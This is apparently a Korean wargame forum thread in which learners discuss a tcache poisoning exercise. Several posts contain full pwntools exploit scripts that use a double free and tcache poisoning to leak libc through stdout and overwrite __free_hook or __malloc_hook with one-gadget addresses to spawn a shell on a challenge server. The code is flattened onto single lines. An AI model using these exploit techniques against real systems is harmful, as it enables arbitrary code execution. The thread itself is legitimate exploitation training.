alloc(0x30, b'dreamhack') free() edit(b'B'*8 + b'\x00') free() tcache[0x40]: chunk A -> stdout -> IO_2_1_stdout -> ... addr_stdout = e.symbols['stdout'] alloc(0x30, p64(addr_stdout)) tcache[0x40]: stdout -> IO_2_1_stdout -> ... alloc(0x30, b'BBBBBBBB') 이 부분에서 BBBBBBBB 은 fd 부분의 주소를 수정했기 때문에 stdout -> IO_2_1_stdout -> ... -> dreamhack -> 의 마지막 순서에 dreamhack 이 BBBBBBBB 주소를 가리키는 것 맞나요 ??

안녕하세요 고수분들 바쁘실텐데 제 질문에 귀중한 시간 내어주셔서 우선 감사인사 드립니다. 강의 익스 과정대로 __free_hook을 overwrite하는데는 이해하고 익스해봤는데요 __malloc_hook을 덮어도 익스해보면 어떨까 했는데 잘 되지않았습니다. __malloc_hook을 libc-2.27.so의 one gadget으로 overwrite하고 switch구문 allocation 1.에 malloc호출해봤는데 EOF 혹은 가젯을 지나쳐 printf("Content: ")이후의 read함수에 걸리지만 쉘이 키보드 입력에 반응하지않습니다. 아직 초보라 개념이 잘 안잡혀있긴한데 이해하려고 최대한 노력해보겠습니다. 포너블 고수님ㅠㅠ 도와주세요!! #!/usr/bin/env python3 from pwn import * def slog(name, addr): return log.success(': '.join([name, hex(addr)])) target_file = './tcache_poison' p = process(target_file, env={'LD_PRELOAD' : './libc-2.27.so'}) p = remote('host3.dreamhack.games', 23578) elf = ELF(target_file) ''' Arch: amd64-64-little RELRO: Full RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) ''' libc = ELF('./libc-2.27.so') def allocate(size, content): p.sendlineafter(b'4. Edit\n', b'1') p.sendlineafter(b'Size: ', str(size).encode()) p.sendafter(b'Content: ', content) def free(): p.sendlineafter(b'4. Edit\n', b'2') def print_chunk(): p.sendlineafter(b'4. Edit\n', b'3') def edit_chunk(content): p.sendlineafter(b'4. Edit\n', b'4') p.sendafter(b'Edit chunk: ', content) if name == 'main': Initial tcache[0x40] is empty. tcache[0x40]: Empty Allocate and free a chunk of size 0x40 (chunk A) tcache[0x40]: chunk A allocate(0x40, b'dreamhack') free() Free chunk A again, bypassing the DFB mitigation tcache[0x40]: chunk A -> chunk A edit_chunk(p64(0) + b'\xff') free() DFB segment fault check allocate(0x40, b'dreamhack') allocate(0x40, b'dreamhack') Append address of stdout to tcache[0x40] tcache[0x40]: chunk A -> stdout -> IO_2_1_stdout -> ... addr_stdout = elf.symbols['stdout'] allocate(0x40, p64(addr_stdout)) tcache[0x40]: stdout -> IO_2_1_stdout -> ... allocate(0x40, b'dreamhack') tcache[0x40]: IO_2_1_stdout -> ... io_2_1_stdout_lsb = p64(libc.symbols['_IO_2_1_stdout'])[0:1] # least significant byte of IO_2_1_stdout allocate(0x40, _io_2_1_stdout_lsb) # allocated at stdout Libc leak print_chunk() p.recvuntil('Content: ') stdout = u64(p.recv(6).ljust(8, b'\x00')) slog('stdout', stdout) libc_base = stdout - libc.symbols['IO_2_1_stdout'] slog('libc_base', libc_base) mh = libc_base + libc.symbols['__malloc_hook'] slog('malloc_hook', mh) fh = libc_base + libc.symbols['__free_hook'] slog('free_hook', fh) og_list = [0x4f3ce, 0x4f3d5, 0x4f432, 0x10a41c] one_gadget = libc_base + og_list[3] slog('one_gadget', one_gadget) Overwrite the __malloc_hook with the address of one-gadget Initial tcache[0x50] is empty. tcache[0x50]: Empty tcache[0x50]: chunk B allocate(0x50, b'dreamhack') free() tcache[0x50]: chunk B -> chunk B -> ... edit_chunk(p64(0) + b'\xff') free() tcache[0x50]: chunk B -> __malloc_hook allocate(0x50, p64(mh)) tcache[0x50]: __free_hook allocate(0x50, b'dreamhack') __malloc_hook = the address of one-gadget allocate(0x50, p64(one_gadget)) Call malloc() to get shell allocate(0x50, p64(0)) free() allocate(0x50, p64(one_gadget)[0:1]) Communicate with shell p.interactive() `

여러번 해제 하려면 key의 값을 덮으므로써 바꾸어야하는데 key의 위치가 어디에 있는지 몰라서 못 덮고 있습니다. 도와주세요.

예제를 살펴보면 setvbuf 함수에 인자로 stdin과 stdout을 전달하는데, 이 포인터 변수들은 각각 libc 내부의 IO_2_1_stdin과 IO_2_1_stdout을 가리킵니다 라고 되어있는데 변수들이 libc 내부의 IO_2_1_stdin등등을 가리키고 있다는 사실은 어떻해 알수잇나요?

Name: tcache_poison.py #!/usr/bin/python3 from pwn import * p = process("./tcache_poison") e = ELF("./tcache_poison") libc = ELF("/lib/x86_64-linux-gnu/libc-2.27.so") def slog(symbol, addr): return success(symbol + ": " + hex(addr)) def alloc(size, data): p.sendlineafter("Edit\n", "1") p.sendlineafter(":", str(size)) p.sendafter(":", data) def free(): p.sendlineafter("Edit\n", "2") def print_chunk(): p.sendlineafter("Edit\n", "3") def edit(data): p.sendlineafter("Edit\n", "4") p.sendafter(":", data) alloc(0x30, "dreamhack") free() edit("A"*8 + "\x00") free() addr_stdout = e.symbols["stdout"] alloc(0x30, p64(addr_stdout)) alloc(0x30, "BBBBBBBB") # "dreamhack" alloc(0x30, "\x60") # stdout print_chunk() p.recvuntil("Content: ") stdout = u64(p.recv(6).ljust(8, b"\x00")) lb = stdout - libc.symbols["IO_2_1_stdout"] fh = lb + libc.symbols["__free_hook"] og = lb + 0x4f432 slog("free_hook", fh) slog("one_gadget", og) 여기서 stdout의 값을 보는 alloc(0x30, p64(addr_stdout)) alloc(0x30, "BBBBBBBB") # "dreamhack" alloc(0x30, "\x60") 이 부분에서 이렇게 했을때 왜 stdout의 값을 볼수 있는지 궁금합니다!

tcache poisoning을 이용해서 aaw, aar을 수행하는데, 여기서 DFB가 들어가야 하는 이유를 잘 모르겠습니다. edit()함수를 이용해서 key값을 변경할 수 있는것을 생각해보면, edit()을 이용해서 fd값도 변경할 수 있으니 굳이 DFB를 하지 않아도 되는 것 아닌가요? 실제로 DFB를 이용하지 않더라도, edit()함수를 이용해서 stdout의 주소를 가져왔고, libc base를 leak했습니다. 여기서 왜 DFB를 사용해야 하는 것 인가요?

맨 처음에 해제된 청크가 제일 마지막에 재할당되는 LIFO 방식으로 알고있었는데 실습문제 코드에서 DFB로 duplication을 일으킨 뒤 libc Leak 과정 중에 첫 번째 할당 alloc(0x30, "BBBBBBBB")에서는 예상과 달리 맨처음 해제되었던 청크가 할당되고, 두 번째 할당 alloc(0x30, "\x60")에서야 stdout에 만든 free chunk가 할당되는게 이해가 안됩니다. 제 생각으로는 stdout에 만든 free chunk가 먼저 재할당되어야하는게 아닌가 싶었습니다 제가 완전 다르게 이해하고있는걸까요?.. ㅠ

from pwn import * p = process('./tcache') libc = ELF('/lib/x86_64-linux-gnu/libc.so.6') malloc_hook_offset = libc.symbols['__malloc_hook'] #0x601010 def allocate(size_g, content): p.sendlineafter('Edit\n', '1') p.sendlineafter('Size: ', size_g) p.sendafter('Content: ', content) def free(): p.sendlineafter('Edit\n', '2') def edit(edit_chunk): p.sendlineafter('Edit\n', '4') p.sendafter('Edit chunk: ', edit_chunk) def print_g(): p.sendlineafter('Edit\n', '3') allocate('100', 'A') free() edit('A'*9) free() allocate('100', p64(0x601010)) allocate('100', 'A') allocate('100', 'a') print_g() p.interactive() ► 0x400893 <main+348> call printf@plt <printf@plt> format: 0x40098d ◂— 'Content: %s' vararg: 0x601010 (stdout@@GLIBC_2.2.5) —▸ 0x7f1307282761 (IO_2_1_stdout+1) ◂— 0xe300000000fbad28 lb구하는 과정인데 print_g 실행하고나서 부분인데 이렇게 되면 0x7f1307282761나 0xe300000000fbad28 둘 중에 뭔진 모르겠지만 한개는 출력될줄 알았는데 아무것도 안되네요. 뭐가 문젤까요

Tcache가 LIFO 순서로 할당된다는데 그렇다면 \# Append address of stdout to tcache[0x40] \# tcache[0x40]: chunk A -> stdout -> IO_2_1_stdout -> ... addr_stdout = e.symbols['stdout'] alloc(0x30, p64(addr_stdout)) \# tcache[0x40]: stdout -> IO_2_1_stdout -> ... alloc(0x30, b'BBBBBBBB') 해당 과정에서 chunk A가 BBBBBBBB로 할당되는 것이 아니라 나중에 들어온 stdout이 할당되어야 하는 것 아닌가요?

이번 문제의 풀이에는 Double Free Bug를 사용했는데, 사실 생각해보면 tcache에 존재하는 청크의 값을 수정할 수 있는 edit 함수가 있다면, next를 수정할 수 있기 때문에 임의의 청크를 DFB를 사용하지 않고 추가할 수 있어서 아래와 같이 풀었는데, 이렇게 풀지 않고 꼭 DFB를 써야 하는 이유가 있을까요 ? from pwn import * p = remote('host3.dreamhack.games', 24385) elf = ELF('./tcache_poison') libc = ELF('./libc-2.27.so') def allocate(size, content): p.sendlineafter(b'Edit\n', b'1') p.sendlineafter(b'Size: ', str(size).encode()) p.sendafter(b'Content: ', content) # 나중에 _IO_2_1_stdout__lsb를 보낼때 sendline으로 보내면 공백이 추가되서 안됨 def free(): p.sendlineafter(b'Edit\n', b'2') def print_chunk(): p.sendlineafter(b'Edit\n', b'3') def edit(content): p.sendlineafter(b'Edit\n', b'4') p.sendafter(b'Edit chunk: ', content) tcache[0x40] : empty chunk : first(1) allocate(0x30, b'first') tcache[0x40] : first(1) chunk : first(1) free() # (1) tcache[0x40] : first(1) -> stdout -> IO_2_1_stdout chunk : first(1) stdout = elf.symbols['stdout'] edit(p64(stdout) + b'a') tcache[0x40] : stdout -> IO_2_1_stdout chunk : first(1) allocate(0x30, b'a') 어떤 값을 대입하면서 allocate하더라도 이미 tcache에는 stdout이 링크드 리스트의 헤더(청크의 헤더X)로 존재하므로 상관없음 tcache[0x40] : IO_2_1_stdout chunk : stdout IO_2_1_stdout_lsb = p64(libc.symbols['_IO_2_1_stdout'])[0:1] # 첫번째 문자열 가져옴 : 문자열에서 첫번째는 lsb allocate(0x30, _IO_2_1_stdout_lsb) 여기서 중요한게, 바로 아래에서 print_chunk를 할건데, stdout에 저장된(가리키는) IO_2_1_stdout을 변조하면 안됨 하지만 libc base를 몰라서 IO_stdout을 모르지만, 다행히 하위 3비트는 오프셋으로 고정되어 있어서 하위 1바이트인 lsb도 고정되있어서 lsb를 대입해주면 됨(리틀엔디언 잘 생각) print_chunk() # stdout에 저장된 IO_2_1_stdout_lsb 주소 출력 p.recvuntil(b'Content: ') # print_chunk에서 'Content: '는 안받아줬기 때문에 여기까지 받아줘야 libc_base를 제대로 계산 가능 Leak libc base libc_base = u64(p.recvn(6).ljust(8, b'\x00')) - libc.symbols['IO_2_1_stdout'] free_hook = libc_base + libc.symbols['__free_hook'] og = libc_base + 0x4f3ce og = libc_base + 0x4f3d5 og = libc_base + 0x4f432 og = libc_base + 0x10a41c 여기서 tcache[0x40] 을 다시 쓰면 IO_2_1_stdout을 가져오는데 이 주소의 값을 바꾸면 안되므로 다른 tcache 엔트리를 써야함 tcache[0x50] : empty chunk : first(1) allocate(0x40, b'first') tcahce[0x50] : first(1) chunk : first(1) free() tcache[0x50] : first(1) -> free_hook chunk : first(1) edit(p64(free_hook)) tcache[0x50] : free_hook chunk : first(1) allocate(0x40, b'a') tcache[0x50] : empty chunk : free_hook allocate(0x40, p64(og)) # free_hook이 저장된 주소에 og가 저장되어 free_hook -> og를 가리키게 됨 Exploit free() p.interactive() `